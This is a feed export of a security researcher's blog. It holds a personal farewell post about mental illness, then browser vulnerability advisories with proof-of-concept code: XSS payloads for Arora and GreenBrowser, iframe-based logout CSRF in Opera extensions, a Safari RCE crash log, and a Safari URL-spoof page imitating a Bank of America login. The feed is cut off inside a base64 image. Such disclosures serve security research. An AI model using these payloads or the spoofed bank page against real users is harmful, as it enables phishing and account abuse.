tag:blogger.com,1999:blog-90115782024-02-06T21:12:58.492-08:00Lostmon BloggerSecurity Research & Analisys:<br>
Personal Blog where I expose my investigations,<br>
advisores and some outstanding news on security.<br>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comBlogger196125tag:blogger.com,1999:blog-9011578.post-74289584558584616502023-05-09T11:05:00.003-07:002023-05-09T11:10:32.072-07:00That is All <p> Lostmon disappeared a few years ago. My way of working and the excessive hours in front of a computer, coupled with high levels of stress and family problems, have led me to a situation where I feel trapped and unable to escape.</p><p>Everyone must fight their own inner demons when they come to visit.</p><p>Reality is just a point of view, and even when we see reality with our own eyes, it can vary and differ from another observer's perspective.</p><p>This has led me to suffer from a mental illness called bipolar schizoaffective disorder. </p><p>Dealing with my enemy is not easy, and I do not want to feed my demons, but computing, PCs, hardware and software, as well as bugs and other technological worlds, have become a mere anecdote in this daily struggle.</p><p>Thank you to all who supported me and believed in me one day.</p><p>Good luck, peace and harmony to all!</p><p>la curiosidad, es lo que hace mover la mente...</p><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-54923485336274954802022-11-14T08:58:00.005-08:002022-11-18T07:29:12.729-08:00Opera, chrome, Firefox, edge browsers DeadSystemException deeplinks and share links Crash DoS<p> Waiting for disclosing details</p><p><br /></p><p>https://bugs.chromium.org/p/chromium/issues/detail?id=1385502</p><p>https://github.com/mozilla-mobile/focus-android/issues/8056</p><p>Related vuln :</p><p>http://lostmon.blogspot.com/2022/10/mozilla-firefox-focus-and-nightly.html</p><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-47294620162298679952022-10-12T10:11:00.032-07:002022-11-25T11:26:28.429-08:00Mozilla firefox focus and Nightly for Android remote crash DoS<p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span><span style="background-color: white; color: #4e2800; font-size: 15.84px;">########</span></p><p><span style="color: #4e2800;"><span style="background-color: white; font-size: 15.84px;">Mozilla Firefox, Focus and Nightly</span></span></p><p><span style="color: #4e2800;"><span style="background-color: white; font-size: 15.84px;">For Android Remote Crash Dos </span></span></p><p><span style="color: #4e2800;"><span style="background-color: white; font-size: 15.84px;">Vulnerability.</span></span></p><p><span style="color: #4e2800;"><span style="background-color: white; font-size: 15.84px;">Last update: 25/11/2022</span></span></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span><span style="background-color: white; color: #4e2800; font-size: 15.84px;">########</span></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;"><br /></span></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">Description </span></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span></p><p>A vulnerability is present in the way that Mozilla for Android mobile products manage the clipboard and handle excepcions. </p><p>A evil site can take profit from software excepcions to do a crash in the app or to deny access to clipboard and cause a crash resulting in lost of available information that not save. </p><p>If we close the app and clear cache etc, we have the same situation a crash or a Dos that Tdo a crash. :)</p><p>The vulnerability interact with parts of Android system like open links in app, and sharing functions. </p><p>It's a of different error messages that the app can't handle or programmer store remote data in parcels, or how store data in clipboard and how process it. </p><p>Multiple app are vulnerable to this style attack resulting in a lost of data, DoS to application, crash aplicattion or DoS to functions or application or dead browser treat activity and force user to close App. </p><p>We can abuse parcels errors in</p><p>TransactionTooLargeException</p><p>DeadSystemException</p><p>Wen can abuse open in app or sharing functions or clipboard functions in</p><p><br /></p><p>TransactionTooLargeException</p><p>DeadSystemException</p><p>ClipboardManager</p><p>content.ClipboardManager.getPrimaryClip</p><p><br /></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span></p><p>Versions afected:</p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span></p><p>Mozilla firefox </p><p>107.1.0 Build #2015915067</p><p>106.1.0 built 2015907747</p><p>105.2.0 built 2015907747</p><p><br /></p><p>Mozilla Nightly </p><p>107.0a1 </p><p>built 2015909163 </p><p>built 2015909131</p><p>built 2015915115</p><p>108.0a1 </p><p>built 2015912339 </p><p>built 2015913675</p><p>109.0a1 </p><p>Build 2015916075</p><p>Build 2015917035</p><p>Build 2015917803</p><p><br /></p><p>Mozilla Focus </p><p>105.0.2 </p><p>built 362762015</p><p>107.1.0</p><p>Built 363142253</p><p>#########################</p><p>Related bugs in other apps</p><p>https://bugs.chromium.org/p/chromium/issues/detail?id=1385502</p><p><br /></p><p>Mozilla issue tracker </p><p>https://github.com/mozilla-mobile/focus-android/issues/8056</p><p>Posible related bug</p><p>https://github.com/mozilla-mobile/android-components/issues/12804</p><p>Tested on</p><p>Android 9, 10, 11, 12 and continue testing</p><p><br /></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span></p><p>Timelime</p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span></p><p>Discovered 28-08-2022</p><p>Vendor notify NO</p><p>Released 12-10-2022</p><p>Last update 25-11-2022</p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">###############</span></p><p>No more details at this time. </p><p>Exploit available in private. </p><p>I update this advisore in few days with more information. </p><p><br /></p><p><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">################ €nd ####################</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">--</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">atentamente:</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">Lostmon (lostmon@gmail.com)</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">Web-Blog: http://lostmon.blogspot.com/</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">Google group: http://groups.google.com/group/lostmon (new)</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">--</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">La curiosidad es lo que hace mover la mente.... </span></p><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-20742820180294639202013-12-14T15:18:00.000-08:002013-12-14T15:25:12.776-08:00Safari for windows 5.1.7 (7534.57.2) Remote code execution############################################<br />
Safari for windows 5.1.7 (7534.57.2) Remote code execution<br />
JavaScriptCore.dll (7534.57.3.3)<br />
Vendor notify: NO Exploit available: Private<br />
Advisore:http://lostmon.blogspot.com.es/2013/12/safari-for-windows-517-7534572-remote.html<br />
#############################################<br />
<br />
Safari for windows is a discontinued product; but in my work
) tecnical support for clients and bussines) i found it installed in serveral
machines.<br />
<br />
Iit is prone vulnerable to a buffer overflow in JavaScriptCore.dll that allows remote crash if failed
or Remote Code Execution if the exploit is succesfully.<br />
<br />
This issue is tiggered when safari try to allocate a large amount of data in javascript stack memory.<br />
We espect a " out of memory" alert box, but we can bypass or fuzzing this alert and result a RCE.<br />
<br />
i don't like the responses from Apple amd this is a discontinued product....
See Windbg Log for this issue:<br />
<br />
<pre>(1240.1334): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=77d25085 edx=00000000 esi=1d7c0000 edi=7ff90240
eip=61b39357 esp=0023f01c ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Safari\Apple Application Support\JavaScriptCore.dll -
JavaScriptCore!WTF::fastMalloc+0x157:
61b39357 c705efbeadbb00000000 mov dword ptr ds:[0BBADBEEFh],0 ds:0023:bbadbeef=????????
0:000> !load msec.dll
0:000> !exploitable -m
VERSION:1.6.0.0
IDENTITY:HostMachine\HostUser
PROCESSOR:X86
CLASS:USER
QUALIFIER:USER_PROCESS
EVENT:DEBUG_EVENT_EXCEPTION
EXCEPTION_FAULTING_ADDRESS:0xffffffffbbadbeef
EXCEPTION_CODE:0xC0000005
EXCEPTION_LEVEL:SECOND_CHANCE
EXCEPTION_TYPE:STATUS_ACCESS_VIOLATION
EXCEPTION_SUBTYPE:WRITE
FAULTING_INSTRUCTION:61b39357 mov dword ptr ds:[0bbadbeefh],0
MAJOR_HASH:0x7fdedd27
MINOR_HASH:0x39b7b969
STACK_DEPTH:6
STACK_FRAME:JavaScriptCore!WTF::fastMalloc+0x157
STACK_FRAME:WebKit!WKDictionaryGetTypeID+0xb112
STACK_FRAME:WebKit!WKCredentialGetTypeID+0x1f776
STACK_FRAME:WebKit!WKCredentialGetTypeID+0x489f2
STACK_FRAME:WebKit!WKCredentialGetTypeID+0x4337e
STACK_FRAME:JavaScriptCore!JSC::JSArray::getOwnPropertySlotByIndex+0x2a44
INSTRUCTION_ADDRESS:0x0000000061b39357
INVOKING_STACK_FRAME:0
DESCRIPTION:User Mode Write AV
SHORT_DESCRIPTION:WriteAV
CLASSIFICATION:EXPLOITABLE
BUG_TITLE:Exploitable - User Mode Write AV starting at JavaScriptCore!WTF::fastMalloc+0x0000000000000157 (Hash=0x7fdedd27.0x39b7b969)
EXPLANATION:User mode write access violations that are not near NULL are exploitable.0:000> !exploitable
!exploitable 1.6.0.0
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at JavaScriptCore!WTF::fastMalloc+0x0000000000000157 (Hash=0x7fdedd27.0x39b7b969)
User mode write access violations that are not near NULL are exploitable.
</pre>
####################### €nd ########################## <br />
--<br />
atentamente:
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--
La curiosidad es lo que hace mover la mente.... <div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-76142373878586676022013-08-27T14:59:00.001-07:002013-08-27T15:04:43.108-07:00Opera browser Speed dial Extensions XSS and CSRF########################################<br />
Opera Browser Speed Dial Extensions XSS and XSRF<br />
Original advisore: http://lostmon.blogspot.com.es/2013/08/opera-browser-speed-dial-extensions-xss.html <br />
########################################<br />
<br />
############<br />
Description:<br />
############<br />
<br />
Speed Dial gives you quick access to your favorite Web sites. Every time you open a new tab, you are presented with a 3x3 grid of thumbnails, each representing a Web address. To open a page, click on the corresponding thumbnail, or use the keyboard shortcuts. http://help.opera.com/Mac/10.50/en/speeddial.html<br />
<br />
#########<br />
Abstract<br />
#########<br />
<br />
Developers Build Extensions for fast access to web services like<br />
Gmail, Flirk or Facebook.<br />
<br />
Speed dial "protect users" to direct XSS attacks, but the extensions used in Speed ??Dial, are not free of bugs and some of them are not safe. A remote attacker could compose special attacks, for abusing the functionality of these extensions in Speed Dial.<br />
<br />
<br />
####################<br />
Extensions for Gmail<br />
####################<br />
<br />
This two extenions show latest unread Emails from Gmail and are prone vulnerables to XSS & CSRF style atacks.<br />
<br />
######<br />
XSS:<br />
######<br />
<br />
If a attacker write a Email and in subject insert a html code it is executed in the extension.<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbWL0lAMgS1MQsI-M8IuSRY5YKVZQraWI61hdUxQmhUoHmjo9ho55KZ6KKKftHop5Ree8xkSosFMYYXyaeEq4yX-gPRdMpFMVlr6RdDoh4loA8z1nLc6BZSxm3EUgHyKGFEzi0/s1600/svg.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbWL0lAMgS1MQsI-M8IuSRY5YKVZQraWI61hdUxQmhUoHmjo9ho55KZ6KKKftHop5Ree8xkSosFMYYXyaeEq4yX-gPRdMpFMVlr6RdDoh4loA8z1nLc6BZSxm3EUgHyKGFEzi0/s400/svg.png" width="400" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
######<br />
XSRF:<br />
######<br />
<br />
If a attacker compose a Email with subject like <br />
"><iframe src="https://mail.google.com/mail/?logout&hl=es"<>/iframe><br />
when the extension refresh content, it cause victim logout function.<br />
<br />
<br />
https://addons.opera.com/es/extensions/details/gmail-on-speed-dial-ex/<br />
https://addons.opera.com/es/extensions/details/gmail-on-speed-dial/<br />
<br />
##############################<br />
Extensions for Google Calendar<br />
##############################<br />
<br />
This Two extensions Show reminders and events from Google Calendar<br />
and are prone vulnerables to XSS & CSRF style attacks<br />
<br />
######<br />
XSS:<br />
######<br />
<br />
If a attacker write a event in a shared calendar and in subject insert a html code it is executed in the extension.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBoxZow78isVr3AohNi6HZeeBRNHKt_tYN0QsDGngNyDddeb-HGAtaPemzHZYFSDqHZUlIOA9irto4QLed2fFEv2icqfVtgyKTewE-c08EzavjHU-P9p9XxeUKju-woQOOXA5J/s1600/iframe.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBoxZow78isVr3AohNi6HZeeBRNHKt_tYN0QsDGngNyDddeb-HGAtaPemzHZYFSDqHZUlIOA9irto4QLed2fFEv2icqfVtgyKTewE-c08EzavjHU-P9p9XxeUKju-woQOOXA5J/s400/iframe.png" width="400" /></a><br />
<br />
######<br />
XSRF:<br />
######<br />
<br />
If a attacker a event in a shared calendar with subject like <br />
"><iframe src="https://www.google.com/calendar/logout"<>/iframe><br />
when the extension refresh content, it cause victim logout function.<br />
<br />
<br />
https://addons.opera.com/es/extensions/details/google-calendar/<br />
https://addons.opera.com/es/extensions/details/gcaltoday/<br />
<br />
################<br />
Related Links<br />
################<br />
<br />
http://lostmon.blogspot.com.es/2010/09/google-chrome-instaled-extensions.html<br />
http://www.osvdb.org/search?search[vuln_title]=lostmon%20extension&search[text_type]=alltext<br />
http://www.oxdef.info/posts/2011/01/18/chrome-ext/<br />
http://www.pcmag.com/article2/0,2817,2359778,00.asp<br />
<br />
<br />
############## End ########################<br />
<br />
##################<br />
Solution<br />
###################<br />
<br />
No solution was available at this time !!!<br />
<br />
################ €nd ####################<br />
<br />
-- <br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....
<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-61700107049357003412012-07-31T10:34:00.000-07:002012-07-31T10:34:46.128-07:00Arora qrc: dialog XSS and DoS########################################<br />
Arora qrc: dialog XSS and DoS<br />
Vendor URL:http://code.google.com/p/arora/<br />
Advisore: http://lostmon.blogspot.com.es/2012/07/arora-qrc-dialog-xss-and-dos.html<br />
Vendor notify:NO exploit available:yes<br />
#######################################<br />
<br />
Arora is a lightweight cross-platform web browser. It's free (as in free speech and free beer). <br />
Arora runs on Linux, embedded Linux, FreeBSD, Mac OS X, Windows, Haiku, and any other platforms <br />
supported by the Qt toolkit.<br />
<br />
Arora uses the QtWebKit port of the fully standards-compliant WebKit layout engine. <br />
It features fast rendering, powerful JavaScript engine and supports Netscape plugins. <br />
<br />
Arora contains a two flaws that allows a remote cross site scripting (XSS) attack and DoS. <br />
<br />
This flaw exists because the application does not validate the qrc: Uri dialog and <br />
internal error pages. This may allow a user to create a specially crafted Link/url that <br />
would execute arbitrary script code in a user's browser within the trust relationship<br />
between their browser and the qrc handler ( local ).<br />
<br />
Also Arora has a second flaw that allow Denial of service or app to crash in a special link.<br />
<br />
<br />
#################<br />
Proof of Concept<br />
#################<br />
<br />
create a html doc and write this code, click in the link and it execute <br />
the xss and if accept the alert box, the app crash :)<br />
<html><body><br />
<a href='qrc:/"><script>alert('Sorry, Now Your App Crash!');</script>'>Arora about: handler XSS</a><br />
</body></html><br />
<br />
################<br />
Versions afected<br />
################<br />
<br />
<span class="h3">Arora 0.10.0 Windows Qt 4.5.3</span><br />
<br />
##################<br />
Solution<br />
###################<br />
<br />
No solution was available at this time !!!<br />
<br />
################ €nd ####################<br />
<br />
-- <br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-12271844331944073292012-04-22T23:51:00.000-07:002012-04-22T23:57:02.994-07:00Firefox 11 DoS using exponential string growth and document.write()#############################################<br />
Firefox 11 DoS using exponential string growth and document.write()<br />
Vendor URL: http://www.mozilla.org<br />
Advisore: http://lostmon.blogspot.com.es/2012/04/firefox-11-dos-using-exponential-string.html<br />
Vendor Bugzilla: https://bugzilla.mozilla.org/show_bug.cgi?id=744637<br />
Vendor Notify: YES <br />
##############################################<br />
<br />
Mozilla firefox for windows in prone vulnerable to a denial of service condition. This think crash is tigger when load a malformed page with a malicious script, that fill up the memory.<br />
<br />
####################<br />
Versions affceted<br />
####################<br />
<br />
Mozilla Firefox 11.0<br />
<br />
##############<br />
Solution<br />
###############<br />
<br />
No solution was available at this time!!<br />
<br />
#############<br />
Proof Of Concept<br />
##############<br />
<br />
see https://bugzilla.mozilla.org/show_bug.cgi?id=744637<br />
<br />
<br />
################ €nd ######################<br />
<br />
-- <br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<br />
<br /><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-72680038727787344112012-03-27T15:16:00.002-07:002012-03-27T15:28:20.868-07:00GreenBrowser About: dialog XSS and stored XSS########################################<br />
GreenBrowser About: dialog XSS and stored XSS<br />
Vendor URL:http://www.morequick.com/<br />
advisore: http://lostmon.blogspot.com/2012/03/greenbrowser-about-dialog-xss-and.html<br />
Vendor notify:NO exploit available:yes<br />
#######################################<br />
<br />
GreenBrowser is your best choice of flexible and powerful green web browser.
GreenBrowser is free to download and use.<br />
<br />
GreenBrowser contains a two flaws that allows a remote cross site scripting (XSS) attack.
This flaw exists because the application does not validate the about: Uri dialog and last visited
pages. This may allow a user to create a specially crafted URL that would execute arbitrary
script code in a user's browser within the trust relationship between their browser
and the server.<br />
<br />
Also the browser save the last URL visited and then, if a user create a crafted link
and clin in, it is a stored XSS because when open the browser by default it open
http://www.5igb.com/StartEn.htm and it have the last visited URL... The xss is executed
in this URL :) page and browser not validate LastVisitWriteEn() before render to the user.<br />
<br />
You can see this function here => http://www.5igb.com/function.js<br />
<br />
#################<br />
Proof of Concept<br />
#################<br />
<br />
create a html doc and write this code, click in the link and it execute the xss
close the browser and open it again, in last visit pages we have the url of PoC
and it executes the stored XSS<br />
<br />
<html><body><br />
<a href='about:"><script>alert(1)</script>'>GreenBrowser about: handler XSS</a><br />
</body></html><br />
<br />
################<br />
Versions afected<br />
################<br />
<br />
6.1.0117 (2012-01-17 10:22:02)<br />
6.1.0216 (2012-02-16 21:37:10)<br />
<br />
##################<br />
Solution<br />
###################<br />
<br />
No solution was available at this time !!!<br />
<br />
################ €nd ####################<br />
<br />
<pre>--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
</pre><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-4495439000466423372012-03-27T10:35:00.001-07:002012-04-03T15:29:08.647-07:00Safari for windows 5.1.5 and prior and IOS URL spoof window.open() test case###########################################<br />
Safari for windows 5.1.5 and prior URL window.open() spoof<br />
Vendor URL: http://www.apple.com<br />
Advisore: <a href="http://lostmon.blogspot.com/2012/03/safari-for-windows-515-and-prior-and.html">http://lostmon.blogspot.com/2012/03/safari-for-windows-515-and-prior-and.html</a><br />
Vendor Notify: YES Exploit available: YES<br />
##########################################<br />
<br />
##############<br />
History:<br />
##############<br />
<br />
Safari has a serious issues with protocol handlers, for long times in diferents protocols and handlers i had report
four or five vulnerabilities in protocols handlers.
i had report a telnet issue in safari for windows, <strike>what Apple patched in silence.</strike><br />
<br />
Today i download and test Safari for windows 5.1.5 only for look if the vulnerability that i report in 03/2012 is patched..
see => http://lostmon.blogspot.com/2012/03/safari-for-windows-and-ios-url-weakness.html
Safari for windows 5.1.5 have the same vulnerability ummm....<br />
<br />
############<br />
Description<br />
############<br />
<br />
Safari set the bar higher for web browsers. It introduced
sophisticated design elements that made browsing a joy.
Easy to use, Safari stayed out of your way and let you
effortlessly navigate from site to site.
Safari for windows Ignore what protocol handler we use, it don't
check if protocol is registered or simply don't check any handler...
In the case what i talk.... A pseudo url spoof can be posible let's
to see some examples to undestanding the nature of this vulnerability.<br />
<br />
Case "about:" Protocol handler.
type in addressbar "about:blank" . and it shows about blank page,
this is what we espect and this template is OK.
Type in addressbar "about:something" and the title and URL shows the same (about:something)
type "about:http://www.bankofamerica.com" and the tithe shows the same...<br />
<br />
Now the best thing is write a title to simulate the title of original page and
write some content in this window (about:http://www.bankofamerica.com)
the URL show it but in reality we are in about:blank page...<br />
<br />
############<br />
PoC's<br />
############<br />
<br />
Create a function to open a new window and write location...<br />
<br />
var wx;
function invokePoC() {
wx = open("about:http://www.bankofamerica.com/login","newwin");
setInterval("doit()",1);
}<br />
<br />
And create a function to write in the result window.<br />
<br />
function doit() {
wx.document.open();
wx.document.write("<title>spoof title</title><body><h1><b>Hello !! i'm a Spoofed Site !!!</b></h1></body>");
}<br />
<br />
With this a remote attacker can do spoof o phishing attacks, but if we think that safari has issues in handlers
the best attack is delete about: protocol handler and simulate bankofamerica for example.
we can oncatenate a www as a handler and concatenate http: handler to get a nice url :)<br />
<br />
##########################<br />
Safari for windows URL Spoof<br />
##########################<br />
<br />
This PoC simulate banc of america URL and content.
The image is enbended via Data: schema.<br />
<br />
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><br />
<html><br />
<head><br />
<title>Safari for windows 5.1.5 and prior URL spoof window.open() test case.</title><br />
<script type="text/javascript"><br />
var wx;<br />
function invokePoC() {<br />
wx = open("http://www:bankofamerica.com/login","newwin");<br />
setInterval("doit()",1);<br />
}<br />
function doit() {<br />
wx.document.open();<br />
wx.document.write("<title>Bank of America | Home | Personal</title><body><img src='data:image/gif;base64,R0lGODdh8QLUAfcAAAAAAAAAQAAAgAAA/wAgAAAgQAAggAAg/wBAAABAQABAgABA/wBgAABgQABggABg/wCAAACAQACAgACA/wCgAACgQACggACg/wDAAADAQADAgADA/wD/AAD/QAD/gAD//yAAACAAQCAAgCAA/yAgACAgQCAggCAg/yBAACBAQCBAgCBA/yBgACBgQCBggCBg/yCAACCAQCCAgCCA/yCgACCgQCCggCCg/yDAACDAQCDAgCDA/yD/ACD/QCD/gCD//0AAAEAAQEAAgEAA/0AgAEAgQEAggEAg/0BAAEBAQEBAgEBA/0BgAEBgQEBggEBg/0CAAECAQECAgECA/0CgAECgQECggECg/0DAAEDAQEDAgEDA/0D/AED/QED/gED//2AAAGAAQGAAgGAA/2AgAGAgQGAggGAg/2BAAGBAQGBAgGBA/2BgAGBgQGBggGBg/2CAAGCAQGCAgGCA/2CgAGCgQGCggGCg/2DAAGDAQGDAgGDA/2D/AGD/QGD/gGD//4AAAIAAQIAAgIAA/4AgAIAgQIAggIAg/4BAAIBAQIBAgIBA/4BgAIBgQIBggIBg/4CAAICAQICAgICA/4CgAICgQICggICg/4DAAIDAQIDAgIDA/4D/AID/QID/gID//6AAAKAAQKAAgKAA/6AgAKAgQKAggKAg/6BAAKBAQKBAgKBA/6BgAKBgQKBggKBg/6CAAKCAQKCAgKCA/6CgAKCgQKCggKCg/6DAAKDAQKDAgKDA/6D/AKD/QKD/gKD//8AAAMAAQMAAgMAA/8AgAMAgQMAggMAg/8BAAMBAQMBAgMBA/8BgAMBgQMBggMBg/8CAAMCAQMCAgMCA/8CgAMCgQMCggMCg/8DAAMDAQMDAgMDA/8D/AMD/QMD/gMD///8AAP8AQP8AgP8A//8gAP8gQP8ggP8g//9AAP9AQP9AgP9A//9gAP9gQP9ggP9g//+AAP+AQP+AgP+A//+gAP+gQP+ggP+g///AAP/AQP/AgP/A////AP//QP//gP///yH5BAAAAAAALAAAAADxAtQBAAi3AP8JHEiwoMGDCBMqXMiwocOHECNKnEixosWLGDNq3Mixo8ePIEOKHEmypMmTKFOqXMmypcuXMGPKnEmzps2bOHPq3Mmzp8+fQIMKHUq0qNGjSJMqXcq0qdOnUKNKnUq1qtWrWLNq3cq1q9evYMOKHUu2rNmzaNOqXcu2rdu3cOPKnUu3rt27ePPq3cu3r9+/gAMLHky4sOHDiBMrXsy4sePHkCNLnky5suXLCOW1IwaMWDt7mEOL/x4NeJ87efvkpQPGuvVn0rBjy1Z7r11r1q9V3+7cbt/s38CDX01dbDfufaY5304GWrjz59CHbrtz6Vty48nu/ZOXbHe7f6nlRR9PvjzLb3deLFi/YMquf7WNExN/L127e/vaFW/tzrz//yTtIuCAAm7D0TYDfnPRLnM88cQcBiFI4EoThrTLFOyx98Il/+xyh3Xu7DYfeJsZxx+AKKaYUYYsPmFgRk+wd4dFl7BoUIwZcojSLhmCdIl6LM7x3o/sPfGePJ5pJ89+JrJWDGq+qSjllA2xaKWCGOG4wIwVAcmeQVZOkRKPX3ZEZJAK3mHlek8IlF+TrRHjjm9LdiYelf9SbmOLJHza8mJE2/ApiS0E7UkoSIImKuihBy6qUKCS6LRmhhBmKWNF32T4QpsEkanpmD1udGaGM34zx6RGwtcdnMDcB59tuyUTJZ7/CbrNrXtK8udDkDIKaaQg3Wrrrb/umlGvCtmaU4bv/eMlpxdpyeVEni5wUI1WpoTeHdxq9I2X7M2R5qRzGIgkqyNup1yTzdFanqAF5WpsQ4YSBK9IuRL0q0f1JqQsTswK5Cm0HXJ7x64Svretjv9IK/CABl3CbXUDbYPtegIWhOF6XjbbIcTT3dGshyIXFHLJA1V4CYcVDiQxdQZ98zLDBKEH5BPjrimuuqwyB16IrLrqbnn/8hp0L0T9CqTnvB3lay+f/A66kJ+SstfsqetVug24C0Cr5cbridnwpWqGTdDF4QqkZagDFQn2tBmCvcAla3uMdZFts4etkWyjvd6fd+uN0CXv7cJ12Ares2qT2ZHIaquzDk3e0YXyybRCSZ/k9ECbb5T5UJTeETiWqKo96QIKSuvpC51OyuHaZQqUadZlt5f36RlyGjh7Yq/Jd5nVhlo7ix7HLDeb7+2zuImNvxl05JKPh2yEfSp9a8XXxyu19Qhnb/2jDHX+D+XYR+g9sQbVSyz6/6yv7/mXK10x1Ryd/sKLF8+BtukaBqxl4AVRXY/mAC4HnU1vq7sdx1j0rH/M/24BL2A